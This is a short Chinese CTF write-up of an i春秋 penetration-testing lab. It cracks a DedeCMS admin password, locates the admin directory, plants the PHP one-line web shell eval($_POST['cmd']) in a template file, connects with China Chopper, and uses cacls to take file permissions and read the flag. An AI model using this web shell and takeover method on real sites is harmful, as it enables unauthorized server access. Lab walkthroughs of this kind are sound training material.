i春秋渗透模拟“真的很简单”（？

i春秋渗透模拟第一题，真的很简单（并不
照着别人wp做的
进入后界面如下，

1.png

点击开始答题后出现第一题为后台密码

2.png
这里就不知道咋做了。。。
后来看了下wp发现提示了要用给出的地址下载dedecms爆破密码（为啥我没有），如下图：
3.png

访问该地址下载dedecms工具后直接爆破得出用户名ichunqiu和md5加密后的密码：adab29e084ff095ce3eb

4.png
然后去https://www.cmd5.com/
上解密发现要付费？？？
在这里解密成功得到密码：only_systemhttps://www.somd5.com/
5.png
提交后出现第二题为后台目录
6.png

又不会了，继续看wp

7.png
8.png
可知目录名为lichunqiul，提交后出现第三题
9.png
首先用第一步得到的用户和密码以及第二步得到的路径登入后台
10.png
要求我们获取桌面的文件，需要构造webshell连接服务器，要找到可以上传文件的地方，但是既然已经登入，直接修改已存在的文件即可。
找到模板-标签源码管理，选择一个，编辑，在第一行加上<?php @eval($_POST["cmd"]);?>然后保存。打开中国菜刀，
11.png
(完整地址为http://www.test.ichunqiu/include/taglib/adminname.lib.php，即加入shell的文件）
连接后找到flag文件后双击为空白，看wp知道是因为权限原因，虚拟终端查看权限
12.png
发现是因为权限不足，用
cacls flag~ichunqiu.txt /E /P system:F
命令更改权限，之后再双击即可得到flag：
13.png
提交后即完成全部题目
（注意仅提交大括号内部分）

总结：看了别人wp之后，题目就会变简单